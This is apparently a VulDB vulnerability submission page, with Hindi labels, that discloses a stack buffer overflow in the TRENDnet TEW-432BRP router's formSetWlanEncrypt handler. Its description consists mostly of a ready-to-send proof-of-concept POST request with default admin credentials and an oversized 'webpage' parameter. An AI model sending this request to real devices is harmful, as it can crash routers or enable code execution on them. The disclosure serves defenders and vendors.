| शीर्षक | TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow |
|---|
| विवरण | In formSetWlanEncrypt function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code.
POST /goform/formSetWlanEncrypt HTTP/1.1
Host: 192.168.10.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1169
Origin: http://192.168.10.1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://192.168.10.1/wlan_security.asp?t=1777347015970
Upgrade-Insecure-Requests: 1
wep_type=1&auth_type=2&wep_key_type=0&wep_key_len=5&wep_def_key=0&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&eap_type=0&cipher_type=0&wpapsk1=12345678&wpapsk2=12345678&radius_ip1=x.x.x.x&radius_port1=1812&radius_pass1=&radius_ip2=x.x.x.x&radius_port2=1812&radius_pass2=&save=1&restore_wireless=&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=onchange&wps_clear_configure_by_reg=0 |
|---|
| स्रोत | ⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_16/16.md |
|---|
| उपयोगकर्ता | pjq_Buoy (UID 97666) |
|---|
| सबमिशन | 28/04/2026 09:14 AM (1 महीना पहले) |
|---|
| संयम | 30/05/2026 06:28 PM (1 month later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 367460 [TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage बफ़र ओवरफ़्लो] |
|---|
| अंक | 20 |
|---|